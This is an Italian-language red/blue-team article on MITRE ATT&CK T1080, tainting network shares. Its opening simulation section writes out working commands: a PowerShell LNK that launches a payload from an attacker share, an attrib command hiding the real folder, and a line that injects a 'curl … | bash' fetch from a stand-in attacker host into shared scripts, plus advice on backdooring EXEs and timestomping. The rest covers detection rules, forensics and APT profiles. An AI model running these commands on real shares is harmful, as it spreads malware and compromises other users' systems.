Condivisioni di Rete Compromesse: Taint Shared Content (T1080)

La simulazione inizia con la preparazione di un payload mascherato. Su Windows, create un LNK malevolo che sostituisce una directory condivisa:

powershell -Command "$sh = New-Object -ComObject WScript.Shell; $lnk = $sh.CreateShortcut('\server\share\Budget2024.lnk'); $lnk.TargetPath = 'C:\Windows\System32\cmd.exe'; $lnk.Arguments = '/c start \attacker\payload.exe & explorer \server\share\RealBudget2024'; $lnk.IconLocation = 'C:\Windows\System32\imageres.dll,3'; $lnk.Save()"

Nascondete la directory originale modificando gli attributi: attrib +h +s "\server\share\RealBudget2024"

Per Linux, contaminate script condivisi iniettando codice all'inizio di file bash esistenti. Questo approccio mantiene la funzionalità originale mascherando l'infezione:

echo 'curl -s http://attacker/beacon.sh | bash &' | cat - /mnt/shared/backup.sh > temp && mv temp /mnt/shared/backup.sh

La contaminazione di binari richiede manipolazione dell'entry point. Utilizzate tool come The Backdoor Factory per infettare EXE mantenendo funzionalità originali. L'infezione si propaga quando utenti remoti eseguono il file compromesso.

Per massimizzare la propagazione, target file con alta frequenza d'uso: template Office, script di login, utility condivise. Gamaredon Group ha dimostrato l'efficacia iniettando macro in tutti i documenti Word/Excel su drive mappati.

Testate la persistenza creando infezioni che sopravvivono a riavvii e scansioni superficiali. Utilizzate tecniche di timestomping per mantenere date originali dei file infetti.

La detection efficace richiede monitoraggio multilivello delle condivisioni critiche. Configurate Sysmon per catturare creazioni di file su path condivisi con EventID 11:

<FileCreate onmatch="include"> <TargetFilename condition="begin with">\server\share</TargetFilename> <TargetFilename condition="end with">.lnk</TargetFilename> </FileCreate>

Monitorate modifiche anomale di attributi file su share. EventCode 4663 rileva accessi a oggetti con permessi specifici. Correlate con 4660 per identificare pattern di modifica-nascondimento tipici del directory pivot.

Create baseline del comportamento normale per distinguere attività legittime da anomalie. Un singolo LNK su share HR potrebbe essere normale, ma la creazione di multipli LNK che puntano a cmd.exe indica compromissione attiva.

Implementate detection comportamentale per identificare esecuzioni da path di rete seguite da connessioni verso IP esterni. RedCurl utilizza questa sequenza per movimento laterale attraverso LNK modificati.

Per Linux, configurate auditd monitorando syscall di scrittura su mount point condivisi: -w /mnt/shared -p w -k shared_write

Riducete falsi positivi escludendo account di servizio autorizzati e processi di backup. Focus su: creazione file eseguibili, modifica di script esistenti, pattern di accesso anomali da workstation.

L'alert più efficace correla tre indicatori: nuovo file su share, esecuzione da path di rete, connessione outbound entro 60 secondi.

L'analisi forense inizia identificando il "paziente zero" attraverso timestamp di creazione sui file infetti. Su Windows, esaminate $MFT per ricostruire la sequenza temporale completa, includendo file nascosti o eliminati.

Utilizzate fsutil usn readjournal per tracciare modifiche su volumi NTFS: fsutil usn readjournal c: startusn=0 > usn_journal.txt

Gli artefatti chiave risiedono nel registro eventi. Security log EventID 5140 registra accessi a share di rete, mentre 5145 dettaglia operazioni su file specifici. Correlate con Sysmon EventID 1 per identificare processi spawned da path UNC.

BRONZE BUTLER lascia tracce distintive: file malevoli con nomi identici a documenti legittimi. Cercate discrepanze tra estensioni e magic number, timestamp anomali, dimensioni file inusuali rispetto agli originali.

Per ricostruire la catena di propagazione, analizzate:

• Prefetch files che mostrano esecuzioni da share
• ShellBags che rivelano navigazione verso directory compromise
• Jump lists contenenti riferimenti a LNK malevoli

Su Linux, examine /var/log/samba/ per accessi SMB e correlate con auth.log per identificare account compromessi. I file infetti spesso mantengono tracce dell'infezione originale nei metadata ELF.

La timeline reconstruction deve mappare: primo file infetto → utenti che l'hanno eseguito → sistemi secondari compromessi → persistenza stabilita.

Darkhotel rappresenta il pioniere di questa tecnica, distribuendo virus auto-propaganti su drive condivisi in campagne mirate contro executive in viaggio. Il gruppo mantiene infrastrutture durature, suggerendo re-infezioni cicliche di share compromessi.

Gamaredon Group scala l'approccio industrialmente, iniettando macro in massa su drive mappati. La loro infrastruttura C2 suggerisce capacità di processare migliaia di documenti infetti simultaneamente. Pattern geografico: focus su organizzazioni dell'Europa orientale con scarsa segmentazione di rete.

BRONZE BUTLER dimostra pazienza strategica, piazzando malware con nomi identici a documenti legittimi e attendendo settimane prima dell'attivazione. Overlap toolset con altri gruppi APT cinesi suggerisce condivisione di TTP a livello statale.

Cinnamon Tempest evolve la tecnica per ransomware deployment, utilizzando batch file su network share per massimizzare l'impatto. La velocità di cifratura indica automazione completa del processo di propagazione.

RedCurl specializza in spionaggio corporate utilizzando LNK modificati per movimento laterale mirato. Il gruppo mantiene profilo basso, suggerendo operazioni di intelligence economica a lungo termine.

I trend emergenti mostrano: integrazione con supply chain attacks, targeting di repository di codice condivisi, weaponization di piattaforme cloud collaboration.

L'evoluzione prevista include compromissione di share attraverso vulnerabilità zero-day in protocolli SMB/NFS e integrazione con tecniche di living-off-the-land per mascherare la propagazione.

Analisi basata su framework MITRE ATT&CK T1080, intelligence su APT Darkhotel, Gamaredon Group, BRONZE BUTLER, Cinnamon Tempest e RedCurl. Detection patterns derivati da Sysmon, auditd e unified logs per ambienti Windows, Linux e cloud.